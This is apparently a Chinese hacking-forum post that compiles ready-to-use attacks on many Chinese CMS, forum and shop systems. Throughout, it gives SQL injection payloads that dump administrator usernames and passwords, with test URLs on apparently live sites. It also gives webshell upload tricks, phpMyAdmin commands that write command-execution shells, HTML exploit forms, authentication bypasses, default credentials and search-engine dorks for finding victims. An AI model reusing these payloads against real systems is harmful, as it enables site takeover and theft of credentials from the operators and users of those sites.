0day合集

admin

启航企业建站系统 cookie注入漏洞通杀所有版本
5 }1 x1 A! c6 b( q
- u& T( ]( u* }# B, E直接上exploit:
; ~) U9 [+ g6 g) E+ Z' u& ujavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 T# I1 [* H2 R' \9 r( v3 \Asprain论坛 注册用户 上传图片就可拿到webshell
5 r4 ~. `4 O- f$ ^5 g
3 v8 }* u+ t* }5 ~' hAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛，一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
8 h- O5 u1 S+ b* d, Z: l- g8 }1.txt存放你的一句话马 如：<%execute(request("cmd"))%>
2.gif 为一小图片文件，一定要小，比如qq表情图片
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头，但是现在传上去还不行，我接下来就用
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
: H% h+ y, S5 j7 v4 z) y5.q.asp;.gif
/ P5 E- i2 ^( B9 Igoogle：Powered by Asprain
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# ^9 {1 a3 O3 A( G5 c! n7 Y0 ^4 z) i
ShopNum1全部系统存在上传漏洞。

! `: v  n+ f. k% w首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
; M& g5 U% v0 K% T2 k- {/ P按说明 提示登录后台。。
' ~7 Q0 a9 y; s7 z3 |在后台功能页面->附件管理->附件列表
可以直接上传.aspx 后缀木马
8 ^8 U$ W2 i) \7 P1 |5 thttp://demo.shopnum1.com/upload/20110720083822500.aspx
( ^6 i7 X( ^5 M9 ^( U% U--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

$ A9 f9 e3 W; J. c' m/ ]牛牛CMS中小企业网站管理系统 上传漏洞

/ J0 Q! A* Z, w# o% e5 A牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
后台:admin/login.asp
) V- T% F$ m2 k4 T  G" J' G$ Aewebeditor 5.5 Nday
exp:
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
<input?type=file?name=uploadfile?size=100><br><br>?
1 T9 q; B" N. }* i. r& c<input?type=submit?value=upload>?
. P/ j" Q4 t( l! P</form>
ps:先上传小马.
inurl:member/Register.asp 您好，欢迎来到立即注册立即登录设为首页加入收藏

+ M' G* x7 b2 y9 ]* Y% U- }# K/ W--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

YothCMS 遍历目录漏洞
; R. [' C# o0 z
6 x1 K: L5 D: M! v  O优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
$ ~5 B! T/ E" Z# R2 V  ~默认后台:admin/login.asp
遍历目录:
ewebeditor/manage/upload.asp?id=1&dir=../
& S# z, w7 T+ S! h; Hdata:
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

. j# s! g1 a2 b# ~" Y! L6 X; XNet112企业建站系统 1.0

源码简介：
Net112企业建站系统，共有：新闻模块，产品模块，案例模块，下载模块，相册模块，招聘模块，自定义模块，友情链接模块 八大模块。
添加管理员：
http://www.0855.tv/admin/admin.asp?action=add&level=2
其实加不加都不是很重要，后台文件都没怎么作验证。
- Y. Q3 h. t) p6 W1 R' l; K上传路径：
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
; u& X! m/ z6 Q& @9 E# Khttp://www.0855.tv/inc/Upfile.asp?Stype=2
/ C, I7 m- @2 }( l5 J# a怎么利用自己研究。
遍历目录：
http://www.0855.tv/admin/upfile.asp?path=../..
如：
http://www.0855.tv/admin/upfile.asp?path=../admin
7 E# s# I1 Y# m2 M+ v" zhttp://www.0855.tv/admin/upfile.asp?path=../data
5 S9 _8 E4 L: C--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& y+ T; L& |1 g5 \
7 Q7 h. |" b! [3 l$ a& t: Y: e易和阳光购物商城通杀 上传漏洞

: {2 I5 z3 @4 S前提要求是IIS6.0+asp坏境。
: T" }+ T5 B+ b  ], g  r漏洞文件Iheeo_upfile.asp
过滤不严.直接可以iis6.0上传
: S, Q8 `- U1 Z7 {5 n% N把ASP木马改成0855.asp;1.gif
* }$ x% }- _9 W1 f! P- M2 o5 M* d! Y1 ~直接放到明小子上传
/ E- n  |; d, R( S  a) [/ |7 a8 t0 }3 AGoogle搜索：inurl:product.asp?Iheeoid=
$ ~" B; d# x6 I0 D  L+ n, e--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

phpmyadmin后台4种拿shell方法
# n  n$ J/ V3 Z# O5 L) j
方法一：
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行，在数据库: mysql 下创建一个表名为：xiaoma，字段为xiaoma1，导出到E:/wamp/www/7.php
一句话连接密码：xiaoma
方法二：
% X' m* G% z: L% R% I* h$ jCreate TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
; {* s% q3 {! `9 E/ ~3 EDrop TABLE IF EXISTS xiaoma;
方法三：
- h6 Y% p* _4 M8 }9 p  [3 K" y0 u  _读取文件内容：    select load_file('E:/xamp/www/s.php');
8 u  U$ {# Q  `5 o- K/ j写一句话：select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
0 l# x" b# {! x6 B9 ^cmd执行权限：select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
/ I. h& M3 A8 _7 ]方法四：
select load_file('E:/xamp/www/xiaoma.php');
: N% M1 G. |7 S  _  F0 Xselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
然后访问网站目录：http://www.xxxx.com/xiaoma.php?cmd=dir
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 `5 E& ?2 }* |' ~" l4 C) s6 f
& ~# Q9 c1 Q' T传信网络独立开发网站源码0day漏洞

后台system/login.asp
" F, _4 H: `- @: w) L1 x: k进了后台有个ewebeditor
+ B% w- L* g& g! AGoogle 搜索inurl:product1.asp?tyc=
5 w$ \- o8 ]* x& ]8 c0 c编辑器漏洞默认后台ubbcode/admin_login.asp
数据库ubbcode/db/ewebeditor.mdb
- O2 ~& R" n8 Y. n# a1 c默认账号密码yzm 111111

) t1 D% Y- l4 B. m* D1 A拿webshell方法
6 X5 M) [0 \; I& W7 k8 b& S: o登陆后台点击“样式管理”-选择新增样式
样式名称:scriptkiddies 随便写
. G( w! h, _* ?8 I* t/ n! T路径模式：选择绝对路径
图片类型：gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
图片类型比如就是我们要上传的ASP木马格式
, ^8 ]$ c# r( q上传路径：/
图片限制：写上1000 免的上不了我们的asp木马
& v% E( {: c; k+ d" Z上传内容不要写
可以提交了
样式增加成功！
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
  k. b& s- [0 e; e2 X& w8 S3 i8 A, G上ASP木马 回车 等到路径
' p7 F- ~+ Z7 J
后台：system/login.asp
Exp:
/ q  }( P5 ^* c  i8 V3 T* I* l; Zand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
& L# ~$ U! b9 T9 e& O测试:
% x% e5 ]9 F8 U7 S9 x; a/ W2 Thttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' y* |1 m$ Q" e$ d) k$ e1 K
foosun 0day 最新注入漏洞

漏洞文件：www.xxx.com/user/SetNextOptions.asp
: k, K$ @! ?- y& |! p利用简单的方法：
暴管理员帐号：
$ r5 T9 Q; k: _- ]! \  T: Jhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
暴管理员密码：
4 I5 O/ f0 ]5 |9 D* x) U. u+ }http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
& C) S8 b! c7 e8 d! }# V7 P--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

网站程序的版权未知！
- q4 M  Q* o5 D* L% R( }
默认网站数据库：
www.i0day.com/data/nxnews.mdb
ewebeditor 在线编辑器：
编辑器数据库下载地址：www.i0day.com/ewebeditor/db/ewebeditor.mdb
登录地址：ewebeditor/admin_login.asp
! b- P. S$ V) p+ U7 p( T默认密码：admin  admin
5 U! Q8 A4 D  q+ R  [登陆后可遍历目录：ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
8 C1 n$ m: H6 }- g& ]
Sql注入漏洞：
http://www.i0day.com/detail.asp?id=12
exp:
/ ^/ b- Y% s! E5 F  Qunion select 1,admin,password,4,5,6,7,8 from admin
爆出明文帐号/密码

上传漏洞：
后台+upfile.asp
如：
+ O. L; u/ i/ r# a- q4 L( ehttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
shell的地址：网址+后台+成功上传的马
! {/ ]/ G- b5 g# y0 s  Egoogle:inurl:news.asp?lanmuName=
+ w9 }# E5 \+ R------------------------------------------------------------------------------------------------------------------------------------------------------------------------

% k  E9 o  |) ~' @0 A. l# ]dedecms最新0day利用不进后台直接拿WEBSHELL

拿webshell的方法如下：
; m+ W( G4 r$ b) A, Y3 M9 F6 h6 i网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell.
" g6 d( W& P! o6 }前题条件，必须准备好自己的dede数据库，然后插入数据：
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
  j5 F6 O7 o6 t2 G6 e
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
4 @3 R! y2 @2 Q6 }  I0 T$ B, y& m<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
4 k" H/ _. g% J# X4 o9 p<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
  w7 z8 g* ]# e- l7 L1 i<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
8 Z3 X- }  M$ i9 o6 f( i<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
* O  u: F( x  s0 ^</form>
<script>
$ s0 y1 S5 S, i) {" @5 Tfunction addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
& u' Z, c0 l# q" _& G-----------------------------------------------------------------------------------------------------------------------------------------------

dedecms织梦暴最新严重0day漏洞
bug被利用步骤如下：
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
, V4 _! q1 s, M6 w( U把上面{}上的字母改为当前的验证码，即可直接进入网站后台。
8 {4 |6 V+ g6 }  _, W-------------------------------------------------------------------------------------------------------------------------------------------

多多淘宝客程序上传漏洞
9 Y6 X  u3 q7 [* y  O漏洞页面：
admin\upload_pic.php
传送门：
1 B* o4 A' X# i6 {http://www.www.com/admin/upload_pic.php?uploadtext=slide1
, ]- l) l  ^/ a0 `! }2 v$ g5 L8 @PS:copy张图片马 直接  xxx.php 上传抓包地址！
------------------------------------------------------------------------------------------------------------------------------------------------------

3 d8 E( U& B7 K8 x* b4 X- h3 t/ @无忧公司系统ASP专业版后台上传漏洞
漏洞文件 后台上传
( @9 g( e5 C) y" aadmin/uploadPic.asp
漏洞利用 这个漏洞好像是雷池的
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
+ T+ s1 z+ ^( b: H/ j等到的webshell路径：
4 D4 Q- m- |& [6 x( F8 [- ?0 K/UploadFiles/scriptkiddies.asp;_2.gif
6 Y; j2 S7 n! H/ ^/ ?$ k---------------------------------------------------------------------------------------------------------------------------------------------------

: P6 g& G5 `. @. z% w( R" `8 b9 e0 O0 q住哪酒店分销联盟系统2010
Search：
' F, g4 Q& Q5 b+ z1 [inurl:index.php?m=hotelinfo
& x# b' w9 L; khttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
& w. N1 }3 x9 X默认后台：index.php?m=admin/login
8 d+ M- E/ x$ z6 s7 q0 M--------------------------------------------------------------------------------------------------------------------------------------------------

1 Z! w7 m+ B- C" K) vinurl:info_Print.asp?ArticleID=
. ~9 o; A' s, b1 X6 T后台 ad_login.asp
% p4 |  i; k: }  S" n爆管理员密码：
2 M& b4 ]+ h* Y/ f9 c% m3 c6 @union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
5 X: }6 x1 v; p: V3 X------------------------------------------------------------------------------------------------------------------------------------------------------------
( T" e1 g8 j. A7 L- W5 u
搜索框漏洞！
7 s- O  H3 A8 z: F4 D- U%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
--------------------------------------------------------------------------------------------------------------------------------------------------------
1 s$ q& L# k* b) M5 R& y7 b
关键字：
/ @9 Y- T$ h# t# [! e; Iinurl:/reg_TemletSel.asp?step=2
或者
$ e3 M5 E( X3 E' B& S6 ~$ B) R3 m电子商务自助建站--您理想的助手
-------------------------------------------------------------------------------------------------------------------------------------------------
* F) {/ b; z! W
0 J: @* B1 X$ ?5 Y! ?iGiveTest 2.1.0注入漏洞
/ h5 t3 o* A2 t* R& z- RVersion: <= 2.1.0
# Homepage: http://iGiveTest.com/
# H2 f: @1 v- [* K* E谷歌关键字: “Powered by iGiveTest”
6 z2 w3 p) ^5 G随便注册一个帐号。然后暴管理员帐号和密码
8 K; m7 Y- G$ B( s, Khttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
------------------------------------------------------------------------------------------------------------------------------------------------
9 j0 u, m: A& L4 [% _& `9 C
CKXP网上书店注入漏洞
工具加表:shop_admin 加字段:admin
. u% r0 P' V. T: g! r后台:admin/login.asp
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
4 m$ C8 l3 u# g4 K5 ?* S* oinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
" P; c  V0 Y3 Y4 g' `) P; e--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

段富超个人网站系统留言本写马漏洞
) X  J9 E4 }% k5 H% Y/ w源码下载：http://www.mycodes.net/24/2149.htm
addgbook.asp 提交一句话。
! l  r$ m7 O$ s! U连接： http://www.xxxx.tv/date/date3f.asp
8 b$ C  C6 y! K, ?1 }3 ?google:为防批量，特略！
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

/ S9 N2 c& T. S2 }1 i* t6 n8 Q/ M智有道专业旅游系统v1.0 注入及列目录漏洞
- l5 v* J" C. K" ~: U默认后台路径：/admin/login.asp
默认管理员：admin
默认密码：123456
SQL EXP Tset:
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

/ ]& a6 c+ h/ R1 z: q3 L/ iewebeditor(PHP) Ver 3.8 本任意文件上传0day
3 ^; i% S+ P6 @8 iEXP：
* t; u4 p$ t# |$ F, B, l<title>eWebeditoR3.8 for php任意文件上EXP</title>
4 L% Z. @4 k( ?0 Z8 v$ P; m<form action="" method=post enctype="multip
art/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
3 L$ {4 U8 |9 h- t<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
$ K9 k8 @1 V  c) K4 a7 A* Gfile:<input type=file name="uploadfile"><br>
<input type=button value=submit onclick=fsubmit()>
</form><br>
, ?  _- l# m7 ^' s<script>
function fsubmit(){
1 @7 p$ e( x1 u- A4 x6 G: ~form = document.forms[0];
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
9 D+ g0 g1 J  e' {4 ?% }9 falert(form.action);
8 a) f: ?8 v6 z# q: P9 }form.submit();
}
</script>
' H! B6 C( r0 E注意修改里面ewebeditor的名称还有路径。
. e4 D3 \6 n; C7 y% d---------------------------------------------------------------------------------------------------------------------------------------------------------------------------

提交’时提示ip被记录 防注入系统的利用
网址：http://www.xxx.com/newslist.asp?id=122′
% V: _% b+ G4 Y% G提示“你的操作已被记录!”等信息。
, f$ s* B# v4 n! T; G( q- e" P  h, l; Y利用方法：www.xxx.com/sqlin.asp看是否存在，存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

( {1 v" l. d2 K5 m0 Q! O西部商务网站管理系统 批量拿shell-0day
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
4 E5 e7 K$ M9 @8 n  W2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
/ V1 i3 l3 Y, M6 T! o3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 }7 f3 z# c6 ]  s4 m" M+ z
JspRun!6.0 论坛管理后台注入漏洞

* ?) d, H- M# \. TSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
- g- Q+ i1 `% R! i  F0 _- _0 O$ o; _JspRun!6.0
% K& Y( u$ o( H漏洞描述:
JspRun!论坛管理后台的export变量没有过滤，直接进入查询语句，导致进行后台，可以操作数据库，获取系统权限。
在处理后台提交的文件中ForumManageAction.java第1940行
& d+ W/ F' C! W# c" lString export = request.getParameter("export");//直接获取，没有安全过滤
if(export!=null){
3 r  z# @6 _" q- v8 B- j; |+ YList&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语，执行了...
' I( P4 V# q: V+ P( U, U) u2 b: jif(styles==null||styles.size()==0){
<*参考
nuanfan@gmail.com
*> SEBUG安全建议:
5 ~+ `# H2 h' i# t+ Owww.jsprun.net
（1）安全过滤变量export
: y. U% X2 y. y8 l! _（2）在查询语句中使用占位符
1 _; Q: `5 H8 w% w/ K6 ~( D------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

乌邦图企业网站系统 cookies 注入
) H9 i. K3 _9 Y* Z. T: g+ P
程序完整登陆后台:/admin/login.asp
6 x: e( K; h7 w6 H默认登陆帐号:admin 密码:admin888
0 E" e' @+ u% Y9 S) ?' G语句：(前面加个空格)
* j! f1 s8 W9 v+ J2 g/ aand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
1 V  u) B0 c5 h: g& J) L6 Y或者是16个字段：
9 [) u1 R- k2 aand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
爆不出来自己猜字段。
注入点：http://www.untnt.com/shownews.asp?=88
getshell:后台有备份，上传图片小马。备份名：a.asp 访问 xxx.com/databakup/a.asp
* Y7 O+ a- \. H- ?$ z关键字：
7 O' c' w2 _8 U8 P" u+ L& Q& ninurl:shownews?asp.id=
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

0 E- G! J* s1 v/ UCKXP网上书店注入漏洞
' [/ T8 j6 {: I" U
工具加表:shop_admin 加字段:admin
后台:admin/login.asp
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------

YxShop易想购物商城4.7.1版本任意文件上传漏洞

http://xxoo.com/controls/fckedit ... aspx/connector.aspx
+ A8 [( v8 ^% E- a跳转到网站根目录上传任意文件。
如果connector.aspx文件被删可用以下exp，copy以下代码另存为html，上传任意文件
& t% ~( H" [+ L8 V6 T, u<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
Upload a new file:<br>
4 V6 m0 G; R# W# r<input type="file" name="NewFile" size="50"><br>
3 l$ Z2 G6 t, E( i7 C<input id="btnUpload" type="submit" value="Upload">
' A$ Z, U  S; ]  B</form>
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 l: e6 J. r! F0 b4 J
# ?% z) b5 F7 W1 Z% PSDcms 后台拿webshell
0 |/ s; b8 Z. B! }/ V, D
# i/ [' I2 M3 T) i' @' o+ f3 T" g第一种方法：
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
. S- R+ C9 c/ B! p& m# _' N把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
' m9 i2 M$ i% f) d6 g5 n用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
& U' q8 m$ S' k7 S- h第二种方法：
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
在文件类型里面添加一个aaspsp的文件类型，然后找一个上传的地方直接上传asp文件！ 注：修改文件类型后不能重复点保存！
2 N) ]3 r/ }; }$ S* B第三种方法：
进入后台-->界面管理-->模板文件管理-->创建文件
2 n" v& O+ _0 O( B5 }$ W" n文件名写入getshell.ashx
内容写入下面内容：
/====================复制下面的=========================/
<%@ WebHandler Language="C#" Class="Handler" %>
2 I; A. t& H: x" X( k- Zusing System;
using System.Web;
  A( h3 o- ~7 @/ J5 ausing System.IO;
$ l  l! w9 u$ Z: N; H# Apublic class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
) y2 Q9 Q5 \. e0 a6 s8 c9 w/ L4 m7 \context.Response.ContentType = "text/plain";
" L( O+ e* M1 m& S. p( ^6 NStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
9 X* ^; S) L) t* Dfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
file1.Flush();
+ p# m) O4 k: [+ X0 Ofile1.Close();
( Q- \: S* `9 l* H, k: k* L. A. Z}
1 \! K) Q, R% L% o: ~8 Tpublic bool IsReusable {
4 W( |0 @0 n+ {- v. o! v8 dget {
+ w$ I6 m; S9 `return false;
1 g3 Q8 Z2 D, E1 F5 P; V) g}
}
% O3 j; W6 S$ ^6 f3 x6 V( U}
/=============================================/
访问这个地址：http://www.xxx.com/skins/2009/getshell.ashx
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
: @: v) _) Z& V1 e9 _' {-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 Q' A0 e$ g( \" B
ESCMS网站管理系统0day
# Z8 H" H9 j% E! N2 o9 B
后台登陆验证是通过admin/check.asp实现的
/ M' \, C, A( I" p
首先我们打开http://target.com/admin/es_index.html
5 D" j7 V: E2 V5 ]% {然后在COOKIE结尾加上
: z6 }3 M0 N9 r5 P" F, D! G; ESCMS$_SP2=ES_admin=st0p;
2 b) r$ e6 Y! x6 h2 C修改,然后刷新
进后台了嘎..
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL

利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
( |, Z( h# U- r( D) A* u------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 M2 s, V$ y8 p/ r4 K5 G7 B7 K7 b2 z
宁志网站管理系统后台无验证漏洞及修复

网上搜了一下,好像没有发布.如有雷同纯粹巧合!
官方网站:www.ningzhi.net
6 I. ?% ~* H: P1 H1 q0 N3 o; v7 d学校网站管理系统 V.2011版本
http://down.chinaz.com/soft/29943.htm
其它版本(如:政府版等),自行下载.
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
! w  ]7 e( k7 C6 E8 Glogin.asp代码如下:
<%  response.Write"<script language=javascript>alert('登陆成功！请谨慎操作！谢谢！');this.location.href='manage.asp';</script>" %>
/ Z9 J9 b7 I! ^/ Xmanage.asp代码我就不帖出来了.反正也没验证.
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
' {" _$ c- \& O# r0 y9 ^* s漏洞利用:
直接访问http://www.0855.tv/admin/manage.asp
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
. u& t8 f% Z3 G7 {9 d) y----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 U+ f: m! I8 n8 Y9 H0 e, J
phpmyadmin拿shell的四种方法总结及修复

方法一：
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
! W0 H9 ]7 N8 ^( x7 G& y5 _0 y" u) aSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
# E) A. f; h; [    一句话连接密码：7on
方法二：
1 v6 B7 P, N1 j' p4 g* }读取文件内容：    select load_file('E:/xamp/www/s.php');
$ f+ w- E* w9 o  j5 h$ D写一句话：    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
cmd执行权限：    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
方法三：
JhackJ版本 PHPmyadmin拿shell
9 X4 D0 F1 |6 W7 dCreate TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
" u* L" _7 {7 {  e# n" P0 B$ kselect cmd from study into outfile 'E:/wamp/www/7.php';
0 Z5 K4 C9 l; p; q# P$ l. gDrop TABLE IF EXISTS study;
, J0 e" \& V5 O: {' l/ V, T; L+ ]<?php eval($_POST[cmd])?>
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
# w4 i7 S1 }8 m: f2 ~, X2 YINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数： 1
' u# P2 A3 S; C5 Y2 }' lSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数： 1
, G+ j$ m1 H3 F4 z% s8 r( WDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
2 _' g  m1 \( N" t( E. [方法四：
select load_file('E:/xamp/www/study.php');
- E; l! |# V2 t7 \6 }select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
6 p+ C* M$ Z0 K) A( T7 [9 J然后访问网站目录：http://www.2cto.com/study.php?cmd=dir
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ L9 W% o1 Q# W6 f( u# Y: B( ]' q  D6 Z
